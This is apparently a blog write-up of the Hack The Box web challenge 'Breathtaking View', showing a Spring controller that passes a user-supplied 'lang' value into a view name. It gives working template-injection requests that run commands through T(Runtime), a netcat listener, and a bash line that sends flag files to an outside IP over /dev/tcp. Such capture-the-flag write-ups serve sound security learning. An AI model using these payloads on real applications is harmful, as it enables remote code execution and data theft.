Breathtaking View

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of the Breathtaking View challenge which is a web challenge from Hack The Box.

lang parameter in IndexController.java

@Controller
public class IndexController {
    @GetMapping("/")
    public String index(@RequestParam(defaultValue = "en") String lang, HttpSession session, RedirectAttributes redirectAttributes) {
        if (session.getAttribute("user") == null) {
            return "redirect:/login";
        }

        if (lang.toLowerCase().contains("java")) {
            redirectAttributes.addFlashAttribute("errorMessage", "But.... For what?");
            return "redirect:/";
        }

        return lang + "/index";
    }
}

lang is provided by user

2910b44e11c3c9c46069539f6320f5de.png

Intercept with Burp

433b7bba768d17583e589776f14ae48f.png

find injection possibility

GET /?lang=__$%7bT(Runtime).getRuntime().exec(%22ls%22)%7d__::.x HTTP/1.1

start listener

nc -lvnp 4444

trigger reverse shell

GET /?lang=__$%7bT(Runtime).getRuntime().exec(new%20String%5b%5d%7b%22bash%22,%20%22-c%22,%20%22cat%20/flag*%20%3E%3E%20/dev/tcp/37.221.197.106/4444%22%7d)%7d__::.x HTTP/1.1

b5962d2801555cff08808fe59674ee6f.png

595eb8a6e90dc2db0a06a0feb403440f.png

HTB{whAt_4_v1ewWwww!}

web